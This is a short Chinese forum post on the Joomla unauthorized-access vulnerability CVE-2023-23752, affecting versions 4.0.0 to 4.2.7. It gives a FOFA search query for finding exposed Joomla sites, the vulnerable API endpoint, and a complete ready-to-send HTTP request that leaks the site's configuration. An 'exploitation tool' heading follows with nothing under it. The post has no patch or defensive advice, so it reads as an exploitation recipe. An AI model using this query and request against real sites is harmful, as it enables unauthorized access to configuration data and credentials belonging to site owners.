90_ 发表于 2023-5-22 17:43:16

Joomla存在未授权访问漏洞

​Joomla存在未授权访问漏洞CVE-2023-23752

影响版本
Joomla 4.0.0版本至4.2.7版本存在安全漏洞

fofa查询语句
app="Joomla"

漏洞复现
漏洞链接:http://xxx.com/api/index.php/v1/config/application?public=true
漏洞数据包:
GET http://xxxx.com/api/index.php/v1/config/application?public=true HTTP/1.1
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive

利用工具:



页: [1]
查看完整版本: Joomla存在未授权访问漏洞